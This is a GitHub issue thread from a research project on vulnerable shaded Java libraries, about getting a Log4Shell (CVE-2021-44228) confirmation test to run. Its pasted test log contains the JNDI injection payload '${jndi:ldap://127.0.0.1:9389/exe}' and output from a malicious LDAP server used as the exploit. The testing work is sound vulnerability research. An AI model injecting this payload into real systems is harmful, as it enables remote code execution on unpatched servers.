search

jensdietrich / xshady

vulnerabilities found in shaded projects
Apache License 2.0
5 stars 2 forks source link

CVE-2021-44228 test should succeed on vulnerable artifacts but fails for an irrelevant reason #22

Closed wtwhite closed 12 months ago

wtwhite commented 12 months ago

See https://github.com/jensdietrich/shadedetector/issues/36#issuecomment-1728681909.

The upshot is that my run-script generator auto-senses testSignalWhenVulnerable to be failure instead of success, resulting in clones being missed.

wtwhite commented 12 months ago

Running java -jar dodgy-ldap-server.jar as root causes the test to succeed on the vulnerable artifact, as intended.

Next: See whether specifying a >1024 port number on both sides gets this working outside of root.

wtwhite commented 12 months ago

mvn clean test now works as expected in my Linux VM, but hung at the following point (after successfully creating foo and reporting test success) on piccolo:

--snip--
[INFO] -------------------------------------------------------
[INFO]  T E S T S
[INFO] -------------------------------------------------------
[INFO] Running ConfirmVulnerabilitiesTests
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] CONNECT conn=0 from="127.0.0.1:57124" to="127.0.0.1:9389"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND REQUEST conn=0 op=0 msgID=1 version=3 dn="" authType="SIMPLE"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND RESULT conn=0 op=0 msgID=1 resultCode=0 etime=1.042
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH REQUEST conn=0 op=1 msgID=2 base="exe" scope=0 filter="(objectClass=*)" attrs="ALL"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH RESULT conn=0 op=1 msgID=2 resultCode=34 diagnosticMessage="Unable to perform the search because an error occurred while attempting to parse base DN 'exe':  The provided string could not be decoded as a DN because no equal sign was found after the RDN attribute 'exe'." etime=5.901 entriesReturned=0
java.lang.NullPointerException
    at Exploit$OperationInterceptor.sendExeResult(Exploit.java:75)
    at Exploit$OperationInterceptor.processSearchResult(Exploit.java:62)
    at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
    at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
    at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
[INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6.498 s - in ConfirmVulnerabilitiesTests

I suspect running the exploit triggered an intrusion detection system on piccolo. I have emailed ECS to let them know, and ask for an exemption. Leaving the issue closed for now.